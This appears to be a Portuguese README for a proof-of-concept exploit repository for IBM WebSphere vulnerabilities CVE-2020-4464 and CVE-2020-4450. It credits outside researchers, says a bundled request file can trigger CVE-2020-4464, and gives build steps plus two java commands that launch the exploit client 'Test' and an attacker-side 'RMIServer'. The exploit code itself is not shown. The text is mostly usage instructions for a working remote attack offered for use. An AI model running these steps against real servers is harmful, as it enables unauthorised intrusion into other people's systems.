
CVE-2020-4464 / CVE-2020-4450
Isto é baseado nas excelentes postagens de blog da ZDI (relatório original por @_tint0):
... e o trabalho de alguns hackers chineses talentosos (não consegui determinar a verdadeira fonte do código, sinta-se à vontade para abrir uma Issue se achar que merece crédito):
Minhas adições (não muito, na verdade):
O código do FoxGlove é incluído como um submódulo, você pode usar o arquivo de requisição do WebSphere para acionar o CVE-2020-4464.
Você deve copiar os diretórios plugins e runtimes do WebSphere para o diretório lib e então executar ant para compilar!
Para executar (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer